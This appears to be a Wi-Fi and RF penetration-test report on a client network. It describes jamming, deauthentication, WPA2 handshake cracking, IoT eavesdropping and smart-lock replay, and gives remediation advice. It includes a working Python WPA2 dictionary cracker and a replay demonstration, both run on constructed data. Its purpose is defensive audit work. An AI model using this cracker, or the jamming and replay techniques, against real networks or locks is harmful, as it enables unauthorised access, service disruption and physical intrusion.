📻 Wi-Fi & RF Security Audit Report (HackRF One Integration) #
Subject: Security Audit of Wi-Fi and Network Infrastructure
Date of Test: 1 June 2024 – 10 June 2024
Location: Bristol, United Kingdom
Company Conducting the Test: CyberSentinel Solutions LTD
Version: 1.0
📑 Executive Summary #
This report presents the results of a comprehensive security audit of the Wi-Fi and network infrastructure conducted by CyberSentinel Solutions LTD in June 2024, using Software-Defined Radio (SDR) tooling, specifically the HackRF One.
The audit focused on identifying vulnerabilities in Wi-Fi communications, wireless IoT devices, and network components across a wide range of radio frequencies. The HackRF One was central to detecting RF leakage, intercepting proprietary IoT wireless communication, simulating jamming attacks, and testing signal security.
Scope of the Audit:
- Wi-Fi Networks (2.4 GHz and 5 GHz bands)
- Wireless IoT Devices (proprietary Sub-GHz RF protocols)
- Local Area Network (LAN) & Network Segmentation
- RF Signal Security & Emanation
🎯 Test Objective #
The key objectives of the Wi-Fi and RF network audit were to:
- Evaluate the security of Wi-Fi encryption (WPA2/WPA3) and test for potential password cracking or interception.
- Investigate vulnerabilities in wireless IoT devices and proprietary RF protocols (e.g., 433 MHz / 868 MHz) used within the environment.
- Simulate jamming and signal interference attacks to assess the network’s resilience.
- Test for leakage of sensitive information through unencrypted RF communications.
- Validate the effectiveness of network segmentation and access control.
🛠️ Test Methodology & Tactical Toolkit #
The assessment combined traditional network penetration testing methodologies with advanced Software-Defined Radio (SDR) techniques.
Tactical Toolkit [SDR & RF Exploitation] #
```yaml
equipment:
  - hardware: "HackRF One (SDR)"
    use: "RF signal analysis (1 MHz to 6 GHz), eavesdropping on wireless protocols, and performing jamming/signal injection attacks."
  - software: "GNU Radio (v3.10)"
    use: "Demodulating wireless signals, inspecting proprietary communication protocols, and processing raw RF data."
  - software: "Aircrack-ng Suite (v1.7)"
    use: "Capturing Wi-Fi handshakes and performing offline WPA2 dictionary attacks."
  - software: "Wireshark (v4.0)"
    use: "Network protocol analyzer used to capture and inspect decrypted wireless traffic."
  - software: "Kali Linux (v2024.1)"
    use: "Primary penetration testing OS running Bettercap, nmap, and Metasploit."
  - hardware: "Alfa AWUS036ACH Wi-Fi Adapter"
    use: "High-powered adapter for monitor mode, frame injection, and WPA2/WPA3 handshake capturing."
  - software: "Bettercap (v2.33.2)"
    use: "MitM attacks, ARP spoofing, and traffic interception."
```
🔬 Phases of the Security Assessment #
Phase 1: Wi-Fi Reconnaissance and RF Signal Capture #
- Date: 1 June 2024 – 2 June 2024
- Objective: Discover Wi-Fi networks and analyze radio frequency traffic for vulnerabilities.
- Procedure: HackRF One and GNURadio were used to scan the 2.4/5 GHz bands and Sub-GHz IoT bands.
- Outcome: Detected `Corporate_WiFi` (WPA3) and `Guest_WiFi` (WPA2-PSK). Identified multiple proprietary IoT devices on the 433 MHz and 868 MHz bands. Critical: RF leakage detected on the 433 MHz band, where sensitive environmental sensor data was transmitted entirely unencrypted.
Phase 2: RF Jamming and Wi-Fi Signal Interference #
- Date: 3 June 2024
- Objective: Simulate Wi-Fi jamming to evaluate network resilience.
- 1. Wi-Fi Signal Jamming: Outcome: The HackRF One broadcast continuous broadband noise on the 2.4 GHz and 5 GHz bands (its 20 MHz instantaneous bandwidth covers roughly one Wi-Fi channel at a time, so whole-band coverage requires sweeping across channels). `Guest_WiFi` suffered a complete Denial of Service (DoS). `Corporate_WiFi` (5 GHz) experienced intermittent disruptions.
- 2. Deauthentication Attack: Outcome: Targeted deauth frames forced clients off `Guest_WiFi`, allowing the successful capture of the WPA2 4-way handshake for offline cracking. Forged deauthentication frames only succeed where Protected Management Frames (802.11w) are not enforced; WPA3 makes them mandatory, which is why the same technique does not apply to `Corporate_WiFi`.
Phase 3: WPA2/WPA3 Handshake Capture and Password Cracking #
- Date: 4 June 2024 – 5 June 2024
- Objective: Crack captured handshakes using offline brute-force/dictionary techniques.
- 1. WPA2-PSK Password Cracking: Outcome: The `Guest_WiFi` passphrase ("guest2024") was recovered within hours by a dictionary attack against the captured handshake, demonstrating poor password hygiene.
- 2. WPA3 (SAE) Security Assessment: Outcome: `Corporate_WiFi` handshakes were captured, but cracking attempts failed. WPA3's Simultaneous Authentication of Equals (SAE) exchange does not expose a password-derived value that can be tested offline, so every guess would require a live exchange with the access point; the captured frames yielded nothing to brute-force.
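The offline attack that recovered the `Guest_WiFi` passphrase works because WPA2-PSK lets an attacker verify every guess against the captured handshake without touching the network again. The Python below is an added example, not the audit's own tooling, and reproduces the core of what Aircrack-ng does: derive the PMK from passphrase and SSID with PBKDF2, expand it to the PTK, and check the MIC on EAPOL message 2. The passphrase `guest2024` and SSID `Guest_WiFi` are from this report; the MAC addresses, nonces, EAPOL frame and wordlist are constructed inside the block so it runs offline.

```python
"""Offline WPA2-PSK dictionary attack against a (constructed) captured 4-way handshake."""
import hashlib
import hmac
import struct

# EAPOL-Key frame layout: 4-byte EAPOL header, then descriptor type(1), key info(2), key length(2),
# replay counter(8), nonce(32), IV(16), RSC(8), ID(8), MIC(16), data length(2).  MIC sits at bytes 81..96.
MIC_OFFSET, MIC_LEN = 81, 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_384(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, 2 and keep 384 bits."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(3)
    )
    return out[:48]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)); KCK is its first 16 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_384(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(MIC_LEN)) -> bytes:
    """Constructed EAPOL-Key message 2 (STA -> AP): RSN descriptor, pairwise, HMAC-SHA1, MIC bit set."""
    key_info = 0x010A  # version 2 (HMAC-SHA1), pairwise key type, MIC present
    body = struct.pack(">BHH", 2, key_info, 0) + struct.pack(">Q", 1)
    body += snonce + bytes(16) + bytes(8) + bytes(8) + mic + struct.pack(">H", 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL v2, type 3 (Key), length


def crack_wpa2(ssid, ap_mac, sta_mac, anonce, snonce, captured_msg2, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None."""
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    zeroed = captured_msg2[:MIC_OFFSET] + bytes(MIC_LEN) + captured_msg2[MIC_OFFSET + MIC_LEN:]
    for candidate in wordlist:
        kck = derive_kck(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


# --- Constructed "capture": a client joining Guest_WiFi with the passphrase the audit recovered ---
SSID = "Guest_WiFi"
AP_MAC = bytes.fromhex("00115566aabb")   # constructed, not from the engagement
STA_MAC = bytes.fromhex("02aabbccddee")  # constructed
ANONCE = bytes(range(32))                # constructed nonces
SNONCE = bytes(range(32, 64))


def simulate_capture(passphrase: str) -> bytes:
    frame = build_eapol_msg2(SNONCE)
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


CAPTURED_MSG2 = simulate_capture("guest2024")
WORDLIST = ["password", "Welcome1", "guest", "guest2023", "guest2024", "Corp-S3cure!2024"]


def run_demo():
    return crack_wpa2(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", run_demo())
```

The cost per guess is fixed by PBKDF2 (4096 HMAC-SHA1 iterations), which is exactly what hashcat mode 22000 parallelises on GPUs; a random 16+ character passphrase pushes the search space out of reach, while SAE removes the offline check entirely, which is the difference between the two Phase 3 outcomes.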
Phase 4: RF Signal Interception and Eavesdropping on IoT #
- Date: 6 June 2024
- Objective: Intercept and exploit proprietary RF signals (433 MHz / 868 MHz).
- 1. Eavesdropping (433 MHz): Outcome: HackRF One and GNURadio easily decoded unencrypted transmissions from smart sensors, exposing sensitive environmental and operational data.
- 2. IoT Replay Attack: Outcome: CRITICAL. RF control signals for smart locks and sensors were captured and replayed using the HackRF One. The devices accepted the replayed transmissions without challenge-response validation, allowing unauthorized physical control over the locks.
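Decoding the 433 MHz sensors in Phase 4 is the step GNU Radio (or a tool like rtl_433) performs after OOK demodulation: classify pulse widths into symbols, group symbols into bits, then parse the bits into fields and check the integrity byte. The Python below is an added illustration and not the audit's flowgraph; the timing constants, bit convention and 32-bit frame layout (sensor ID, signed temperature in tenths, flags, additive checksum) are a constructed, hypothetical protocol, because the report does not describe the real one. Its input is a list of (high, low) pulse durations in microseconds, which is what a demodulated capture yields.

```python
"""Pulse-width (PWM/OOK) decoder for a constructed, hypothetical 433 MHz sensor protocol."""

# Constructed timing for the hypothetical protocol (not measured from the audited devices).
SHORT_US, LONG_US, TOLERANCE_US = 500, 1500, 200
SYNC_GAP_US = 4000  # a long low period announces the start of a frame


def classify(width_us: int):
    """Map a pulse width to 'S' (short) or 'L' (long); None if it matches neither within tolerance."""
    if abs(width_us - SHORT_US) <= TOLERANCE_US:
        return "S"
    if abs(width_us - LONG_US) <= TOLERANCE_US:
        return "L"
    return None


def encode_frame(payload: bytes) -> list:
    """Encoder used only to construct sample bursts: bit 1 = long high/short low, bit 0 = short high/long low."""
    pulses = [(SHORT_US, SYNC_GAP_US)]  # sync pulse followed by the long gap
    for byte in payload:
        for i in range(7, -1, -1):
            bit = (byte >> i) & 1
            pulses.append((LONG_US, SHORT_US) if bit else (SHORT_US, LONG_US))
    return pulses


def decode_pwm(pulses):
    """Turn (high_us, low_us) pairs into a bit list; None on a timing glitch inside the frame."""
    bits, in_frame = [], False
    for high, low in pulses:
        if low >= SYNC_GAP_US - TOLERANCE_US:  # sync gap: (re)start the frame
            bits, in_frame = [], True
            continue
        if not in_frame:
            continue  # noise before the first sync
        symbols = (classify(high), classify(low))
        if symbols == ("L", "S"):
            bits.append(1)
        elif symbols == ("S", "L"):
            bits.append(0)
        else:
            return None  # pulse that fits neither symbol: corrupted burst
    return bits


def bits_to_bytes(bits):
    if bits is None or len(bits) % 8:
        return None
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


def parse_sensor_frame(payload: bytes):
    """Hypothetical layout: sensor_id(8) | temp_tenths(12, two's complement) | flags(4) | checksum(8).
    checksum = sum of the first three bytes mod 256; a plaintext integrity byte, not authentication."""
    if payload is None or len(payload) != 4 or sum(payload[:3]) % 256 != payload[3]:
        return None
    raw = (payload[1] << 4) | (payload[2] >> 4)
    if raw & 0x800:
        raw -= 0x1000
    return {"sensor_id": payload[0], "temperature_c": raw / 10, "flags": payload[2] & 0x0F}


def build_payload(sensor_id: int, temp_c: float, flags: int) -> bytes:
    """Builds a frame in the hypothetical layout so the sample burst is self-consistent."""
    raw = int(round(temp_c * 10)) & 0xFFF
    body = bytes([sensor_id, raw >> 4, ((raw & 0xF) << 4) | (flags & 0xF)])
    return body + bytes([sum(body) % 256])


SAMPLE_BURST = encode_frame(build_payload(0x5A, 23.5, 0x1))  # constructed capture: sensor 0x5A reporting 23.5 C


def demo():
    return parse_sensor_frame(bits_to_bytes(decode_pwm(SAMPLE_BURST)))


if __name__ == "__main__":
    print(demo())
```

Nothing in this pipeline needs a key: anyone with a 433 MHz receiver and the pulse timings can read the data, which is what the "entirely unencrypted" finding in Phase 1 means in practice. The checksum only detects corruption; it gives the receiver no way to tell a forged or replayed frame from a genuine one.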
Phase 5: Network Segmentation and Vulnerability Scanning #
- Date: 7 June 2024
- Objective: Test LAN segmentation and scan for exposed internal services.
- Procedure: Attempted lateral movement from `Guest_WiFi` and executed service scans via nmap and Metasploit.
- Outcome: Guest-to-Corporate segmentation was functional. However, a misconfigured IoT device on the corporate network was reachable from the guest segment. Vulnerability scans revealed an outdated printer susceptible to Remote Code Execution (RCE) and a legacy file server still running the deprecated SMBv1 protocol.
Phase 6: Post-Exploitation Analysis and Cleanup #
- Date: 9 June 2024 – 10 June 2024
- Outcome: Unencrypted IoT devices were reconfigured where possible. The segmentation bypass was patched. Printer firmware was flagged for immediate updates, and SMBv1 was disabled on the file server to prevent EternalBlue (MS17-010) exploitation.
📊 Vulnerability Overview Matrix #
| Vulnerability | Severity | Status | Notes |
|---|---|---|---|
| Weak Guest Wi-Fi Password | CRITICAL | ❌ Not Fixed | Easily cracked using dictionary attack (“guest2024”). |
| Unencrypted IoT RF Signals (433 MHz) | HIGH | ❌ Not Fixed | Sensitive data transmitted in plaintext over RF. |
| Replay Attacks on IoT Devices | CRITICAL | ❌ Not Fixed | Smart locks accept replayed commands, allowing unauthorized physical access. |
| Outdated Printer Firmware (RCE) | HIGH | ❌ Not Fixed | Firmware version carries a known remote code execution vulnerability. |
| SMBv1 Enabled on File Server | HIGH | ❌ Not Fixed | Vulnerable to EternalBlue (MS17-010). |
| Segmentation Weakness for IoT | MEDIUM | ❌ Not Fixed | Guest network allowed routing access to corporate IoT devices. |
🛡️ Strategic Recommendations #
- Strengthen Wi-Fi Password Policies: Enforce WPA3 encryption for all networks where hardware permits. For legacy WPA2 networks, implement a complex, 16+ character passphrase that is rotated periodically.
- Mitigate IoT Replay Attacks: Replace legacy 433 MHz smart locks with devices that implement cryptographic challenge-response authentication, or at minimum rolling codes, so that a captured transmission cannot be reused. Rolling codes alone remain exposed to jam-and-replay attacks, in which the attacker jams the receiver while recording a code the receiver never saw and transmits it later; challenge-response closes that gap.
- Encrypt IoT Communications: Ensure all deployed IoT sensors use AES-128 or stronger for data transmitted over proprietary Sub-GHz RF protocols, in an authenticated mode (e.g., AES-CCM) with a per-message counter or nonce so the receiver can reject both tampered and replayed frames. Encryption without authentication and replay protection would not have stopped the attack observed in Phase 4.
- Improve Network Segmentation: Place all IoT devices (printers, smart locks, sensors) into a strictly isolated VLAN with no inbound routing permitted from the Guest network.
- Disable SMBv1: Immediately disable the deprecated SMBv1 protocol across all file servers and workstations to neutralize the risk of ransomware propagation (e.g., WannaCry/EternalBlue).
- Patch Management: Update firmware on all network printers and infrastructure devices to remediate known RCE vulnerabilities.
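To make the Phase 4 replay finding and the two IoT recommendations concrete, the Python below models both receiver designs side by side: a fixed-code lock that accepts any frame carrying its static code (the behaviour the audit observed), and a lock that requires a strictly increasing counter bound to the command by a keyed MAC. This is an added example, not firmware from the audited devices or code from the audit; the frame layout, device key, window size and command byte are constructed. HMAC-SHA256 truncated to 8 bytes stands in for the AES-CMAC or AES-CCM tag a real device would use, because the standard library has no AES.

```python
"""Replay attack against a fixed-code RF lock versus a counter-plus-MAC receiver (constructed models)."""
import hashlib
import hmac
import os
import struct

UNLOCK = 0x01  # constructed command byte


class FixedCodeLock:
    """Receiver that trusts any frame carrying its static code: what the 433 MHz locks in Phase 4 did."""

    def __init__(self, code: bytes):
        self.code = code
        self.unlocked = False

    def receive(self, frame: bytes) -> bool:
        if frame == self.code + bytes([UNLOCK]):
            self.unlocked = True
            return True
        return False


class AuthenticatedLock:
    """Receiver that accepts a command only if its tag verifies and its counter is new (within a loss window)."""

    TAG_LEN = 8    # truncated MAC; stand-in for an AES-CMAC/CCM tag on a constrained radio
    WINDOW = 16    # tolerate this many frames lost in transit before resynchronisation is needed

    def __init__(self, key: bytes):
        self.key = key
        self.last_counter = 0
        self.unlocked = False

    def _tag(self, body: bytes) -> bytes:
        return hmac.new(self.key, body, hashlib.sha256).digest()[:self.TAG_LEN]

    def receive(self, frame: bytes) -> bool:
        if len(frame) != 5 + self.TAG_LEN:
            return False
        body, tag = frame[:5], frame[5:]
        counter, cmd = struct.unpack(">IB", body)  # counter(4) | command(1)
        if not hmac.compare_digest(self._tag(body), tag):
            return False  # forged or corrupted: tag does not match counter+command
        if not (self.last_counter < counter <= self.last_counter + self.WINDOW):
            return False  # replayed (counter already seen) or too far ahead
        self.last_counter = counter
        if cmd == UNLOCK:
            self.unlocked = True
        return True


class AuthenticatedRemote:
    """Transmitter paired with AuthenticatedLock; never reuses a counter value."""

    def __init__(self, key: bytes):
        self.key = key
        self.counter = 0

    def command(self, cmd: int) -> bytes:
        self.counter += 1
        body = struct.pack(">IB", self.counter, cmd)
        return body + hmac.new(self.key, body, hashlib.sha256).digest()[:AuthenticatedLock.TAG_LEN]


def replay_demo() -> dict:
    """Capture one legitimate unlock frame with the SDR, wait for the door to relock, retransmit it."""
    fixed = FixedCodeLock(bytes.fromhex("a5c3"))       # constructed static code
    captured = fixed.code + bytes([UNLOCK])             # what the legitimate remote sends
    fixed_first = fixed.receive(captured)
    fixed.unlocked = False                              # door relocked
    fixed_replay = fixed.receive(captured)              # attacker replays the recording

    key = os.urandom(16)                                # per-device key provisioned at pairing (constructed)
    remote, lock = AuthenticatedRemote(key), AuthenticatedLock(key)
    frame = remote.command(UNLOCK)
    auth_first = lock.receive(frame)
    lock.unlocked = False
    auth_replay = lock.receive(frame)                   # same bytes replayed: counter already consumed
    return {"fixed_first": fixed_first, "fixed_replay": fixed_replay,
            "auth_first": auth_first, "auth_replay": auth_replay}


if __name__ == "__main__":
    print(replay_demo())
```

The attacker in the second half holds a perfectly valid frame and still gets nothing, because validity is tied to a counter the receiver has already consumed. The loss window exists so a remote pressed out of range does not desynchronise the pair; it is also why a plain rolling code without a tag bound to the command is still exposed to the jam-and-replay approach noted in the recommendations.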
AUTHORIZATION AND SIGN-OFF #
Prepared by:
- Dr. James Anderson | Lead Security Analyst
- Emily Walker | Senior Network Security Engineer
Entity: CyberSentinel Solutions LTD
Date: June 2024